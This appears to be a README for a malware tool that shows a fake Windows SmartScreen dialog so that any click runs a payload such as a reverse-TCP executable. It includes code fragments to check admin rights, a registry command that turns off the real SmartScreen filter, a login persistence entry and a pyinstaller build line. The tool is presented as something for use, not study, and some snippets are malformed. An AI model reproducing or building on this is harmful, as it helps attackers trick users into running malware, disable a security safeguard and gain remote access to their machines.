payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter
All options allow for the execution of an execution, and this can be used in a different way, such as opening a port in a Windows machine, or doing it in a different way. can equate the value of any option to any malicious activity want.
received_792226466002279.mp4
This exploit allows you to make payload executeion and create execution of administrator privileges by simulating the Windows Smart Screen by clicking any option in the window such as Don't run or (X) to close the window with stop the real smartscreen filter
1.Payload executeion : def dont_run_action(): = other_command = r'C:\Users\username\ReverseTCP.exe'
2.Administrator privileges : return ctypes.windll.shell32.IsUserAnAdmin()
3.Stop the real smartscreen filter : os.system('reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "EnableSmartScreenFilter" /t REG_DWORD /d "0" /f')
4.The registry entry is intended to run the script (sys.argv[0]) every time the user logs in
There are some differences in Windows Smart Screen version, such as the background colors of the options, some of which are blue, and the other dimension has a white background. You can control this by modifying the script. Also, there are some that contain the word “Don’t run” without “Run anyway”
Build: pyinstaller --onefile Checkmate.py
Note:In some cases, after the compiling process, the code responsible for stopping the Real Windows Smart Screen from working does not work, and in some other cases, when we run the script without doing a ground compile, it does not work. There are some cases similar to this. There are flaws in this technique, but I am still working on the development stages.